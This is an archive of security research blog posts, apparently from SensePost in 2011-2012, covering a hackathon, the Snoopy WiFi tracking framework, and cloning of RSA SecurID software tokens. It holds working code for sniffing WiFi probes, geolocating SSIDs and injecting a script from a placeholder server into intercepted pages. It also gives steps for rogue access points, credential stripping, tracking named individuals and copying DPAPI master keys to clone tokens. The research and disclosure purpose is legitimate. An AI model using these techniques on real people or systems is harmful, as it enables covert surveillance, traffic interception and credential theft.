
Wed, 5 Dec 2012

SensePost Hackathon 2012

Last month saw the inaugural SensePost hackathon happen in our new offices in Brooklyn, South Africa. It was the first time the entire company had been on the same continent, let alone in the same room, together and away from the pressures of daily work. The idea was simple: weeks before the date, we sent out emails asking everyone in the company (not just the tech teams, but everyone) to think about ideas, tools, approaches or new business lines that they felt would make us even better at what we do.

Hackathons are used by many tech companies to give their employees breathing space to work on new ideas. Google and Facebook are big fans, and Facebook's Like button was conceived as part of a hackathon. Getting everyone together at the same time was no mean feat (the term 'herding cats' springs to mind), but in the week of the 12th of November all SensePost'rs were in our new offices and ready to break, build and develop.

Prior to the event, we asked everyone to think about what they wanted to work on. As mentioned above, there was no specific guideline as to what anyone could come up with, as you can't force creativity. After a brainstorming session, the following ideas were given and solutions made during the hackathon period*:

1. SensePost World App

A mobile application (multi-platform) that will streamline the process of receipts, expenses, travel requests, holiday leave etc.

2. SensePost IRC Bot

An IRC bot that will offer:

  1. Integration with our internal twitter clone
  2. SMS functionality to summon $person
  3. Location whereabouts functionality (who is in the office, who's at a client etc.)
  4. Cool links functionality
  5. SensePost short URL functionality
  6. Ability to call $username via Gtalk/Skype
3. SensePost SMS Gateway App

An application that allows us to utilise SMS from a company-wide perspective, including:

  1. Ability to receive OTP passwords to a central number
  2. Ability to send passwords to clients via web interface (for sales)
  3. Ability to send HackRack passwords to clients via web interface
Rogan decided to use kannel to interface with a GSM dongle on an Ubuntu server, which exposed a web API. Glenn then wrote a Python script to monitor for new mail arriving at a SensePost email address and dispatch SMSs via kannel.
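The original mail-to-SMS script isn't public, but the moving parts are simple enough to sketch: poll a mailbox for unseen messages and relay each one through kannel's standard sendsms HTTP interface (smsbox listens on port 13013 by default). A rough, hedged illustration follows; the mail server, credentials, mailbox and destination number are placeholders, not the actual SensePost setup.

# Hedged sketch: poll an IMAP mailbox and relay new mail as SMS via kannel's
# sendsms HTTP interface. All hostnames, credentials and numbers below are
# placeholders, not SensePost's real configuration.
import email
import imaplib
import time
import urllib.parse
import urllib.request

IMAP_HOST = "imap.example.com"            # placeholder mail server
IMAP_USER = "sms-gateway@example.com"     # placeholder mailbox
IMAP_PASS = "changeme"
KANNEL_URL = "http://localhost:13013/cgi-bin/sendsms"   # kannel smsbox default
KANNEL_USER, KANNEL_PASS = "sendsms-user", "sendsms-pass"
DEST_NUMBER = "+27000000000"              # placeholder recipient

def send_sms(text):
    params = urllib.parse.urlencode({
        "username": KANNEL_USER,
        "password": KANNEL_PASS,
        "to": DEST_NUMBER,
        "text": text[:160],               # keep it to a single SMS
    })
    urllib.request.urlopen(KANNEL_URL + "?" + params, timeout=10)

def poll_once():
    imap = imaplib.IMAP4_SSL(IMAP_HOST)
    imap.login(IMAP_USER, IMAP_PASS)
    imap.select("INBOX")
    _, data = imap.search(None, "UNSEEN")
    for num in data[0].split():
        _, msg_data = imap.fetch(num, "(RFC822)")     # fetching marks it as seen
        msg = email.message_from_bytes(msg_data[0][1])
        send_sms("%s: %s" % (msg["From"], msg["Subject"]))
    imap.logout()

if __name__ == "__main__":
    while True:
        poll_once()
        time.sleep(60)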

4. Magstripe Hacking

Having moved into our new fancy offices, we decided to look at the magstripe implementation used for parking, to work out whether we could read the data, clone it and create free parking for ourselves (while potentially looking for flaws in the magstripe implementation). The magstripes on the parking tickets were very unusual. Between the reader in the office and Andrew Mohawk's more advanced ones, we could not get a consistent read. It is possible that the cards use an unusual arrangement of tracks: typically there are three horizontal tracks at predefined heights, and if these tracks are at unusual heights we may have been getting interference between them. Andrew has tried to dissect one of the cards, but no luck yet.

Watch this space.

5. AV VirusTotal Project

Rather than submitting our payloads to VirusTotal (who then inform the vendors), we will create our own version that uses all vendors, to determine if our custom payloads could be detected.

6. SensePost Green Project

A project to make our business greener in approach and ideas. How responsibly were we using resources? What was our consumption of electricity and water like and could it be made better?

With teams created and everyone clear on what they had to do, 48 hours were given to create the above ideas. Food, drink, hardware and toys were provided. Vlad brought some amazing Russian vodka, and energy drinks were supplied.

Whilst the older farts faded quickly (I'll put my hand up: 1am and I was broken), the younger crowd went through the night and into the next morning. From simple initial ideas, fully-fledged solutions were designed and then developed in a short space of time. The idea was that once the 48-hour hackathon period was over, everyone would present their results and we'd head out to our balcony for a traditional SA braai (barbecue).

The cool thing about the hackathon was that some of the top ideas came from traditionally non-technical people, such as our finance wizard who came up with the idea of the SensePost world app. This was the outcome that we wanted: to prove that you don't need to be a heavy tech-orientated person to come up with meaningful projects or ideas.

Overall, the 2012 hackathon was a brilliant time. Some amazing ideas came to light: ones that will see us pushing offensive approaches further, and ones that will have an impact on the way we work at SensePost.

For those thinking about running an internal hackathon, I'd say go for it. Giving people the space to work on ideas with like-minded colleagues will only bring benefits.

*There were other projects, but they won't see the light of day as of yet, so will remain confidential until the time is right.

Tue, 25 Sep 2012

Snoopy: A distributed tracking and profiling framework

At this year's 44Con conference (held in London) Daniel and I introduced a project we had been working on for the past few months. Snoopy, a distributed tracking and profiling framework, allowed us to perform some pretty interesting tracking and profiling of mobile users through the use of WiFi. The talk was well received (going on what people said afterwards) by those attending the conference and it was great to see so many others as excited about this as we have been.

In addition to the research, we both took a different approach to the presentation itself. A 'no bullet points' approach was decided upon, so the slides themselves won't be that revealing. Using Steve Jobs as our inspiration, we wanted to bring the fun back to technical conferences, and our presentation hopefully reflected that. As I type this, I have been reliably informed that the DVD, and subsequent videos of the talk, are being mastered and will be ready shortly. Once we have them, we will update this blog post. In the meantime, below is a description of the project.

Background

There have been recent initiatives from numerous governments to legalise the monitoring of citizens' Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism. Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere.

Snoopy

The above inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds, could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data? Rather than terrorist-hunting, we would perform simple tracking and real-time + historical profiling of devices and the people who own them. It is perhaps worth mentioning at this point that Snoopy is composed of various existing technologies combined into one distributed framework.

"Snoopy is a distributed tracking and profiling framework."

Below is a diagram of the Snoopy architecture, which I'll elaborate on:

1. Distributed?

Snoopy runs client side code on any Linux device that has support for wireless monitor mode / packet injection. We call these "drones" due to their optimal nature of being small, inconspicuous, and disposable. Examples of drones we used include the Nokia N900, Alfa R36 router, Sheeva plug, and the RaspberryPi. Numerous drones can be deployed over an area (say 50 all over London) and each device will upload its data to a central server.

2. WiFi?

A large number of people leave their WiFi on. Even security-savvy folk: for example, at BlackHat I observed >5,000 devices with their WiFi on. As per the 802.11 specification (i.e. not down to individual vendors), client devices send out 'probe requests' looking for networks that the devices have previously connected to (and the user chose to save). The reason for this appears to be twofold: (i) to find hidden APs (not broadcasting beacons) and (ii) to aid quick transition when moving between APs with the same name (e.g. if you have 50 APs in your organisation with the same name). Fire up a terminal and bang out this command to see these probe requests:

tshark -n -i mon0 subtype probe-req

(where mon0 is your wireless device, in monitor mode)
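The same capture can be scripted. Below is a minimal probe-request sniffer written with scapy, purely to illustrate the fields a drone would upload (timestamp, client MAC, probed SSID and, where the radiotap header provides it, signal strength); it is not Snoopy's actual client code.

# Minimal probe-request sniffer with scapy -- an illustration of the fields a
# Snoopy drone collects, not the project's client code. mon0 must already be
# in monitor mode (e.g. via airmon-ng).
import time
from scapy.all import sniff, Dot11ProbeReq, Dot11Elt

def handle(pkt):
    if not pkt.haslayer(Dot11ProbeReq):
        return
    mac = pkt.addr2                                  # client MAC address
    elt = pkt.getlayer(Dot11Elt)                     # first element is the SSID
    ssid = elt.info.decode(errors="ignore") if elt else ""
    rssi = getattr(pkt, "dBm_AntSignal", None)       # needs a radiotap header
    if ssid:                                         # skip broadcast (empty) probes
        print("%d %s %s %r" % (time.time(), mac, rssi, ssid))

sniff(iface="mon0", prn=handle, store=False)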

3. Tracking?

Each Snoopy drone collects every observed probe request and uploads it to a central server (timestamp, client MAC, SSID, GPS coordinates, and signal strength). On the server side, client observations are grouped into 'proximity sessions' - i.e. device 00:11:22:33:44:55 was sending probes from 11:15 until 11:45, and we can therefore infer that it was within proximity of that particular drone during that time.

We now know that this device (and therefore its owner) was at a certain location at a certain time. Given enough monitoring stations running over enough time, we can track devices/humans based on this information.
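Server side, turning the raw observation stream into these 'proximity sessions' is essentially gap-based grouping. A hedged sketch of that logic follows; the five-minute gap threshold is an assumption for illustration, and this is not Snoopy's actual server code.

# Group (timestamp, mac) observations into proximity sessions: consecutive
# sightings of the same MAC with no silence longer than MAX_GAP seconds.
from collections import defaultdict

MAX_GAP = 300   # assumed threshold: a 5-minute gap ends a session

def proximity_sessions(observations):
    """observations: iterable of (unix_timestamp, mac).
    Returns {mac: [(first_seen, last_seen), ...]}."""
    by_mac = defaultdict(list)
    for ts, mac in sorted(observations):
        by_mac[mac].append(ts)

    sessions = defaultdict(list)
    for mac, times in by_mac.items():
        start = prev = times[0]
        for ts in times[1:]:
            if ts - prev > MAX_GAP:       # gap too long: close this session
                sessions[mac].append((start, prev))
                start = ts
            prev = ts
        sessions[mac].append((start, prev))
    return sessions

# A device probing steadily from 11:15 to 11:45 near one drone yields a single
# session spanning those thirty minutes.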

4. Passive Profiling?

We can profile device owners via the network SSIDs in the captured probe requests. This can be done in two ways: simple analysis, and geo-location.

Simple analysis could be along the lines of "Hmm, you've previously connected to hooters, mcdonalds_wifi, and elCheapoAirlines_wifi - you must be an average Joe" vs "Hmm, you've previously connected to BA_firstclass, ExpensiveRestaurant_wifi, etc. - you must be a high roller".

Of more interest, we can potentially geo-locate network SSIDs to GPS coordinates via services like Wigle (whose database is populated via wardriving), and then from GPS coordinates to street address and street view photographs via Google. What's interesting here is that as security folk we've been telling users for years that picking unique SSIDs when using WPA[2] is a "good thing" because the SSID is used as a salt. A side-effect of this is that geo-locating your unique networks becomes much easier. Also, we can typically instantly tell where you work and where you live based on the network name (e.g BTBusinessHub-AB12 vs BTHomeHub-FG12).

The result - you walk past a drone, and I get a street view photograph of where you live, work and play.
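Looking up a probed SSID programmatically can be done against Wigle's REST API. The sketch below uses the current v2 search endpoint, which post-dates the 2012 research; the endpoint, parameters and response field names (results, trilat, trilong) are assumptions to verify against Wigle's documentation, and the API credentials are placeholders.

# Hedged sketch: look up an SSID on Wigle and print candidate coordinates.
# Endpoint and field names follow Wigle's current v2 API (assumed -- check
# their documentation); the API name/token are placeholders.
import base64
import json
import urllib.parse
import urllib.request

WIGLE_API_NAME = "your-api-name"      # placeholder credentials from wigle.net
WIGLE_API_TOKEN = "your-api-token"

def locate_ssid(ssid):
    query = urllib.parse.urlencode({"ssid": ssid})
    req = urllib.request.Request(
        "https://api.wigle.net/api/v2/network/search?" + query)
    auth = base64.b64encode(
        ("%s:%s" % (WIGLE_API_NAME, WIGLE_API_TOKEN)).encode()).decode()
    req.add_header("Authorization", "Basic " + auth)
    with urllib.request.urlopen(req, timeout=30) as resp:
        data = json.load(resp)
    # 'trilat'/'trilong' are the coordinate fields Wigle currently returns (assumed)
    return [(net.get("trilat"), net.get("trilong"), net.get("ssid"))
            for net in data.get("results", [])]

if __name__ == "__main__":
    for lat, lon, name in locate_ssid("BTHomeHub-FG12"):
        print(name, lat, lon)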

5. Rogue Access Points, Data Interception, MITM attacks?

Snoopy drones have the ability to bring up rogue access points. That is to say, if your device is probing for "Starbucks", we'll pretend to be Starbucks, and your device will connect. This is not new, and dates back to Karma in 2005. The attack may have been ahead of its time, as there were far fewer wireless devices back then. Given that every man and his dog now has a WiFi-enabled smartphone, the attack is much more relevant.

Snoopy differentiates itself with its rogue access points in the way data is routed. Your typical Pineapple, Silica, or various other products store all intercepted data locally, and mangle data locally too. Snoopy drones route all traffic via an OpenVPN connection to a central server. This has several implications:

(i) We can observe traffic from *all* drones in the field at one point on the server.
(ii) Any traffic manipulation needs only be done on the server, and not once per drone.
(iii) Since each drone hands out its own DHCP range, when observing network traffic on the server we see the source IP addresses of the connected clients (resulting in a unique mapping of MAC <-> IP <-> network traffic).
(iv) Due to the nature of the connection, the server can directly access the client devices. We could therefore run nmap, Metasploit, etc. directly from the server, targeting the client devices. This is a much more desirable approach compared to running such 'heavy' software on the drone (as the Pineapple, or Pwnphone/plug, would).
(v) Since the drone does not store data or malicious tools locally, there is little harm if the device is stolen or captured by an adversary.

On the Snoopy server, the following is deployed with respect to web traffic:

(i) Transparent Squid server - logs IPs, websites, domains, and cookies to a database.
(ii) sslstrip - transparently hijacks HTTP traffic and prevents HTTPS upgrades by watching for HTTPS links and redirecting, then mapping those links into either look-alike HTTP links or homograph-similar HTTPS links. All credentials are logged to the database (thanks Ian & Junaid).
(iii) mitmproxy.py - allows for arbitrary code injection, as well as the use of self-signed SSL certificates. By default we inject some JavaScript which profiles the browser to discern the browser version, what plugins are installed, etc. (thanks Willem).

Additionally, a traffic analysis component extracts and reassembles files, e.g. PDFs, VoIP calls, etc. (thanks Ian).
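To give an idea of what point (iii) looks like in practice, here is a rough sketch of JavaScript injection written against mitmproxy's current addon API. The 2012-era mitmproxy.py inline-script API differed, this is not the script Willem wrote, and the payload URL is a placeholder.

# Sketch of server-side JavaScript injection as a mitmproxy addon. Run with
# something like: mitmproxy -s inject.py (with transparent mode configured).
from mitmproxy import http

# Placeholder payload -- a real profiling script would enumerate plugins, etc.
PAYLOAD = '<script src="http://snoopy-server.example/profile.js"></script>'

def response(flow: http.HTTPFlow) -> None:
    ctype = flow.response.headers.get("content-type", "")
    if "text/html" not in ctype or not flow.response.text:
        return
    # Inject just before </body> so the page still renders normally.
    flow.response.text = flow.response.text.replace(
        "</body>", PAYLOAD + "</body>", 1)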

6. Higher Level Profiling?

Given that we can intercept network traffic (and have clients' cookies/credentials/browsing habits/etc.), we can extract useful information via social media APIs. For example, we could retrieve all Facebook friends, or Twitter followers.

7. Data Visualization and Exploration?

Snoopy has two interfaces on the server: a web interface (thanks Walter), and Maltego transforms.

- The Web Interface

The web interface allows basic data exploration, as well as mapping. The mapping part is the most interesting - it displays the position of Snoopy drones (and client devices within proximity) over time. This is depicted below:

- Maltego

Maltego Radium has recently been released, and it is one awesome piece of kit for data exploration and visualisation. What's great about the Radium release is that you can combine multiple transforms together into 'machines'. A few example transformations were created to demonstrate:

1. Devices Observed at both 44Con and BlackHat Vegas

Here we depict devices that were observed at both 44Con and BlackHat Las Vegas, as well as the SSIDs they probed for.

2. Devices at 44Con, pruned

Here we look at all devices and the SSIDs they probed for at 44Con. The pruning consisted of removing all SSIDs that only one client was looking for, as well as those that more than 20 clients were probing for. This could reveal 'relationship' SSIDs. For example, if several people from the same company were attending, they could all be looking for their work SSID. In this case, we noticed the '44Con crew' network being quite popular. To further illustrate Snoopy we 'targeted' these poor chaps, figuring out where they live, as well as their Facebook friends (pulled from intercepted network traffic*).

Snoopy Field Experiment

We collected broadcast probe requests to create two main datasets. I collected data at BlackHat Vegas, and four of us sat in various London underground stations with Snoopy drones running for 2 hours. Furthermore, I sat at King's Cross station for 13 hours (!?) collecting data. Of course it may have made more sense to just deploy an unattended Sheeva plug, or hide a device with a large battery pack - but that could've resulted in trouble with the law (if spotted on CCTV). I present several graphs depicting the outcome from these trials:

The pie chart below depicts the proportion of observed devices per vendor, from the total sample of 77,498 devices. It is interesting to see Apple's dominance.

The bar chart below depicts the average number of broadcast SSIDs from a random sample of 100 devices per vendor (standard deviation bars need to be added - it was quite a spread).

The bar chart below depicts my day sitting at King's Cross station. The horizontal axis depicts chunks of time per hour, and the vertical axis the number of unique device observations. We clearly see the rush hours.

Potential Use

What could be done with Snoopy? There are likely legal, borderline, and illegal activities. Such is the case with any technology.

Legal

- Collecting anonymized statistics on thoroughfare. For example, Transport for London could deploy these devices at every London underground station to get statistics on peak human traffic. This would allow them to deploy more staff, or open more pathways, etc. Such data over a period of months and years would likely be of use for future planning.
- Penetration testers targeting clients to demonstrate the WiFi threat.

Borderline

- This type of technology could likely appeal to advertisers. For example, a reseller of a certain brand of jeans may note that persons who prefer certain technologies (e.g. Apple) frequent certain locations.
- Companies could deploy drones in each of their establishments (supermarkets, nightclubs, etc.) to monitor user preference, e.g. observing a migration of customers from one establishment to another after the deployment of certain incentives (promotions, a new layout).
- Imagine the Government deploying hundreds of drones all over a city, and then having field agents with mobile drones in their pockets. This could be a novel way to track down or follow criminals. The other side of the coin, of course, being that they track all of us...

Illegal

- Let's pretend we want to target David Beckham. We could attend several public events at which David is present (drone in pocket), ensuring we are within reasonable proximity to him. We would then look for the overlap of commonly observed devices over time at all of these functions. Once we get down to one device observed via this intersection, we could assume the device belongs to David (a minimal sketch of this intersection step follows below). Perhaps at this point we could bring up a rogue access point that targets only his device, and proceed maliciously from there. Or just satisfy ourselves by geolocating the places he frequents.
- Botnet infections, malware distribution. That doesn't sound very nice. Snoopy drones could be used to infect users' devices, either by injecting malicious web traffic, or by firing exploits from the Snoopy server at devices.
- Unsolicited advertising. Imagine browsing the web, and an unscrupulous third party injects viagra adverts at the top of every visited page?
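The 'narrow it down by intersection' step in the first scenario is tiny in code. A hedged illustration with made-up MAC addresses:

# Intersect the device sets seen at several events to find the MAC(s) common
# to all of them -- the "narrow it down to the target" step described above.
def common_devices(*events):
    """Each argument is a set of MAC addresses observed at one event."""
    return set.intersection(*events)

event_a = {"00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff", "de:ad:be:ef:00:01"}
event_b = {"00:11:22:33:44:55", "12:34:56:78:9a:bc"}
event_c = {"00:11:22:33:44:55", "de:ad:be:ef:00:01"}

print(common_devices(event_a, event_b, event_c))   # {'00:11:22:33:44:55'}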


Similar tools

- Immunity's Stalker and Silica
- Hubert's iSniff GPS

Snoopy in the Press

- Risky Biz Podcast
- Naked Scientist Podcast (transcript)
- The Register
- Fierce Broadband Wireless

***FAQ***

Q. But I use WPA2 at home, you can't hack me! A. True - if I pretend to be a WPA[2] network, the association will fail. However, I bet your device is probing for at least one open network, and when I pretend to be that one I'll get you.

Q. I use Apple/Android/Foobar - I'm safe! A. This attack is not dependent on the device or manufacturer; it's a function of the WiFi specification. The vast majority of observed devices were in fact Apple (>75%).

Q. How can I protect myself? A. Turn off your WiFi when you leave home/work. Be cautious about using it in public places too - especially on open networks (like Starbucks). A. On Android and on your desktop/laptop you can selectively remove SSIDs from your saved list. As for iPhones, there doesn't seem to be an option - please correct me if I'm wrong? A. It'd be great to write an application for iPhone/Android that turns off probe-requests, and will only send them if a beacon from a known network name is received.

Q. Your research is dated and has been done before! A. Some of the individual components, perhaps. Having them strung together in our distributed configuration is new (AFAIK). Also, some original ideas were unfortunately published first, as often happens with these things.

Q. But I turn off WiFi, you'll never get me! A. It was interesting to note how many people actually leave WiFi on. e.g. 30,000 people at a single London station during one day. WiFi is only one avenue of attack, look out for the next release using Bluetooth, GSM, NFC, etc :P

Q. You're doing illegal things and you're going to jail! A. As mentioned earlier, the broadcast nature of probe-requests means no laws (in the UK) are being broken. Furthermore, I spoke to a BT Engineer at 44Con, and he told me that there's no copyright on SSID names - i.e. there's nothing illegal about pretending to be "BTOpenzone" or "SkyHome-AFA1". However, I suspect at the point where you start monitoring/modifying network traffic you may get in trouble. Interesting to note that in the USA a judge ruled that data interception on an open network is not illegal.

Q. But I run iOS 5/6 and they say this is fixed!! A. Mark Wuergler of Immunity, Inc did find a flaw whereby iOS devices leaked info about the last 3 networks they had connected to. The BSSID was included in ARP requests, which meant anyone sniffing the traffic originating from that device would be privy to the addresses. Snoopy only looks at broadcast SSIDs at this stage - and so this fix is unrelated. We haven't done any tests with the latest iOS, but will update the blog when we have done so.

Q. I want Snoopy! A. I'm working on it. Currently tidying up code, writing documentation, etc. Soon :-)

Thu, 24 May 2012

RSA SecurID software token update

There has been a healthy reaction to our initial post on our research into the RSA SecurID software token. A number of readers had questions about certain aspects of the research, and I thought I'd clear up a number of the concerns that people have.

The research pointed out two findings, the first of which is in fact a design vulnerability in the RSA software token's "Token Binding" mechanism. The second finding is another design issue that affects not only the RSA software token but also any other software that generates pseudo-random numbers from a "secret seed" while running on traditional computing devices such as laptops, tablets or mobile phones. Doing this properly is the approach taken by hardware tokens, which are often tamper-resistant.

Let me first explain one of the usual use cases of RSA software token deployments:

  1. The user applies for a token via an RSA self-service console or a custom web form
  2. The user receives an email which contains the "software token download URL". Once the software is installed, they should open the program, choose Token Storage Devices, read the "Device Serial Number" and reply with this device serial number to complete their token request.
  3. The second email will contain an attachment of the user's personal RSA SecurID Token Configuration file, which they will import into the RSA software token. This configuration file is bound to the user's laptop or PC.
  4. The third email contains an initial password to activate the token.
An attacker who is able to capture the victim's configuration file and initial password (the security of this initial password is the subject of future research at SensePost and will be released in the future) would be able to import it into his own token using the described method and bypass the token binding. This attack can be launched remotely and does not require a "fully compromised machine" as RSA has stated.

The second finding, as I mentioned before, is a known issue with all software tokens. Our aim at SensePost was to demonstrate how easy/hard it would be for an attacker, who has already compromised a system, to extract RSA token secrets and clone them on another machine. A number of people commented on the fact that we did not disclose the steps required to update the LSA secrets on the cloned system. Whilst this technique is relatively easy to do, it is not required for this attack to function.

If a piece of malware was written for this attack, it does NOT have to grab the DPAPI blobs and replicate them on the attacker's machine. It can simply hook CryptUnprotectData and steal the decrypted blobs once the RSA software token starts execution. The sole reason I included the steps to replicate the DPAPI blobs on another machine was that this research was performed during a real-world assessment, which was time-limited. We chose to demonstrate the attack to the client by replicating the DPAPI blobs instead of developing proof-of-concept malcode.
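For reference, this is roughly what a call through that API looks like from Python via ctypes: the same decryption the software token performs, and the point at which a hook would see the plaintext. It is a sketch of the documented Win32 call, not hooking code, and it must run in the context of the user (or machine) that protected the blob.

# Decrypt a DPAPI blob by calling CryptUnprotectData through ctypes -- the API
# discussed above. This is the documented call itself, not hooking code.
import ctypes
from ctypes import wintypes

class DATA_BLOB(ctypes.Structure):
    _fields_ = [("cbData", wintypes.DWORD),
                ("pbData", ctypes.POINTER(ctypes.c_char))]

def dpapi_unprotect(blob):
    buf = ctypes.create_string_buffer(blob, len(blob))
    blob_in = DATA_BLOB(len(blob), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char)))
    blob_out = DATA_BLOB()
    ok = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blob_in), None, None, None, None, 0, ctypes.byref(blob_out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(blob_out.pbData, blob_out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(blob_out.pbData)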

A real-world malware targeting RSA software tokens would choose the API hooking method or a similar approach to grab the decrypted seed and post it back to the attacker.

"I'm also curious to know whether software token running on smartphones might be vulnerable."

The "Token Binding" bypass attack would be successful on these devices, but with a different device serial ID calculation formula. However, the application sandboxing model deployed on most modern smartphone operating systems would make it more difficult for a malicious application deployed on the device to extract the software token's secret seeds. Obviously, if an attacker has physical access to a device for a short time, they would be able to extract those secrets. This is in contrast to tamper-proof hardware tokens or smart cards, which by design provide a very good level of protection even if they are in the hands of an attacker for a long time.

"Are the shortcomings you document particular to RSA, or probably applicable to Windows software tokens from rival vendors too?"

All software tokens that execute a pseudo-random number generation algorithm based on a "secret value" are vulnerable to this type of cloning attack; not because of algorithm vulnerabilities, but simply because the software runs on an operating system and storage that are not designed to be tamper-resistant in the way modern smart cards, TPM chips and secure memory cards are.

One solution for this might be implementing a "trusted execution" environment in CPUs, which has been done before for desktops and laptops by Intel (Intel TXT) and AMD. ARM's "TrustZone" technology is a similar implementation, which targets mobile phone devices and secures mobile software from logical and a range of physical attacks.

Thu, 17 May 2012

A closer look into the RSA SecurID software token

Widespread use of smart phones by employees to perform work-related activities has introduced the idea of using these devices as authentication tokens. As an example of such attempts, RSA SecurID software tokens are available for iPhone, Nokia and the Windows platforms. Obviously, mobile phones cannot provide the level of tamper-resistance that hardware tokens do, but I was interested to know how easy/hard it could be for a potential attacker to clone RSA SecurID software tokens. I used the RSA SecurID Software Token for Microsoft Windows version 4.10 for my analysis and discovered the following issues:

The device serial number of tokens can be calculated by a remote attacker:

Every instance of the installed SecurID software token application contains a hard drive plug-in (implemented in tokenstoreplugin.dll) that has a unique device serial number. This serial number can be used for "Device Binding" and the RSA documentation defines it as follows:

Before the software token is issued by RSA Authentication Manager, an additional extension attribute (<DeviceSerialNumber/>) can be added to the software token record to bind the software token to a specific device. The device serial number is used to bind a token to a specific device. If the same user installs the application on a different computer, the user cannot import software tokens into the application because the hard drive plug-in on the second computer has a different device serial number from the one to which the user's tokens are bound."
Reverse engineering the hard drive plug-in (tokenstoreplugin.dll) indicated that the device serial number is dependent on the system's host name and the current user's Windows security identifier (SID). An attacker with access to these values can easily calculate the target token's device serial number and bypass the above-mentioned protection. Account SIDs can be enumerated in most Microsoft Active Directory based networks using publicly available tools, if the "enumeration of SAM accounts and shares" security setting is not set to disabled. Host names can easily be resolved using internal DNS or Microsoft RPC. The following figures show the device serial number generation code:

The SecurID device serial number calculation can be represented with the following formula:

device_serial_number = Left(SHA1(host_name + user_SID + "RSA Copyright 2008"), 10)
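In Python, the published formula looks roughly like the sketch below. The input encoding, the casing of the host name and SID, and the reading of Left(..., 10) as the first ten hex characters of the digest are assumptions drawn from the formula above, not confirmed implementation details.

# Hedged reconstruction of the published device serial number formula:
#   device_serial_number = Left(SHA1(host_name + user_SID + "RSA Copyright 2008"), 10)
# Encoding, casing and the meaning of Left(..., 10) are assumptions.
import hashlib

def device_serial_number(host_name, user_sid):
    material = (host_name + user_sid + "RSA Copyright 2008").encode("utf-8")
    return hashlib.sha1(material).hexdigest()[:10]

# Hypothetical example values:
print(device_serial_number("WORKSTATION01",
                           "S-1-5-21-1111111111-2222222222-3333333333-1001"))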

Token's copy protection:

The software token information, including the secret seed value, is stored in a SQLite version 3 database file named RSASecurIDStorage under the “%USERPROFILE%\Local Settings\Application Data\RSA\RSA SecurID Software Token Library” directory. This file can be viewed by any SQLite database browser, but sensitive information such as the checksum and seed values are encrypted. RSA documentation states that this database file is both encrypted and copy protected: “RSA SecurID Software Token for Windows uses the following data protection mechanisms to tie the token database to a specific computer:

• Binding the database to the computer's primary hard disk drive

• Implementing the Windows Data Protection API (DPAPI)

These mechanisms ensure that an intruder cannot move the token database to another computer and access the tokens. Even if you disable copy protection, the database is still protected by DPAPI.”

The RSASecurIDStorage database file has two tables: PROPERTIES and TOKENS. The DatabaseKey and CryptoChecksum rows found in the PROPERTIES table were found to be used for copy protection purposes, as shown in the figure below:
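The same inspection can be done with Python's built-in sqlite3 module. The small sketch below lists the tables and dumps the PROPERTIES rows; the column layout is whatever the schema defines, and the sensitive values remain encrypted blobs at this point.

# Open the RSASecurIDStorage SQLite file and dump its tables -- the PROPERTIES
# and TOKENS tables mentioned above. DatabaseKey and CryptoChecksum will still
# be encrypted at this point.
import os
import sqlite3

DB_PATH = os.path.expandvars(
    r"%USERPROFILE%\Local Settings\Application Data"
    r"\RSA\RSA SecurID Software Token Library\RSASecurIDStorage")

con = sqlite3.connect(DB_PATH)
cur = con.cursor()

cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
print("tables:", [row[0] for row in cur.fetchall()])

for row in cur.execute("SELECT * FROM PROPERTIES"):
    print(row)

con.close()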

Reverse engineering of the copy protection mechanism indicated that:

  • The CryptoChecksum value is encrypted using the machine's master key, which can only be decrypted on the same computer system, unless the attacker can find a way to import the machine key and other supporting data to their machine
  • The DatabaseKey is encrypted using the current logged-on user's master key and provides token binding to that user account
Previous research on the Microsoft Windows DPAPI internals has made offline decryption of the DPAPI protected data possible. This means that if the attacker was able to copy the RSA token database file along with the encryption master keys to their system (for instance by infecting a victim's machine with a rootkit), then it would be possible to decrypt the token database file on their machine. The detailed attack steps to clone a SecurID software token by copying the token database file from a victim's system are as follows:
  1. Copy the token database file, RSASecurIDStorage, from the user profile directory
  2. Copy the user's master key from %PROFILEDIR%\Application Data\Microsoft\Protect\%SID%; the current master key's GUID can be read from Preferred file as shown in the figure below:
  3. Copy the machine's master key from the %WINDIR%\system32\Microsoft\Protect\ directory. Microsoft Windows protects machine keys against tampering by using SHA1 hash values, which are stored and handled by the Local Security Authority Subsystem Service (LSASS) process in Microsoft Windows operating systems. The attacker should also dump these hash values from LSA using publicly available tools like lsadump.
  4. Having all the required master keys and the token database file, install and deploy a Windows machine and change the machine and user SIDs to the victim's system SID by using available tools such as NewSID.
  5. Overwrite the token database file and the user and machine master keys with the ones copied from the victim's system. You would also need to find a way to update the DPAPI_SYSTEM value in the LSA secrets of the Windows machine. Currently, this is the only challenge that I was not able to solve, but it should be possible to write a tool similar to lsadump which updates LSA secrets.
  6. When the above has been performed, you should have successfully cloned the victim's software token, and if you run the SecurID software token program on your computer, it will generate the exact same random numbers that are displayed on the victim's token.
In order to demonstrate the possibility of the above-mentioned attack, I installed and activated token A and token B on two separate Windows XP virtual machines and attempted to clone token B on the virtual machine that was running token A. Taking the above steps, token B was successfully cloned on the machine running token A, as shown in the following figures:

In order to counter the aforementioned issues, I would recommend the use of "trusted platform module" (TPM) bindings, which associates the software token with the TPM chip on the system (TPM chip for mobiles? there are vendors working on it).

Thu, 3 Nov 2011

Squinting at Security Drivers and Perspective-based Biases

While doing some thinking on threat modelling, I started examining what the usual drivers of security spend and controls are in an organisation. I've spent some time on multiple fronts: security management (been audited, had CIOs push for priorities), security auditing (followed workpapers and audit plans), pentesting (broke in however we could) and security consulting (tried to help people fix stuff), and I've even dabbled with trying to sell some security hardware. This has given me some insight (or at least an opinion) into how people have tried to justify security budgets, changes, and findings, or at least how I tried to. This is a write-up of what I believe these drivers to be (caveat: this is my opinion). It is certainly not universalisable, i.e. it's possible to find unbiased, highly experienced people, but they will still have to fight the tendencies their position puts on them. What I'd want you to take away from this is that we need to move away from using these drivers in isolation, and towards more holistic risk management techniques, of which I feel threat modelling is one (although this entry isn't about threat modelling).

Auditors

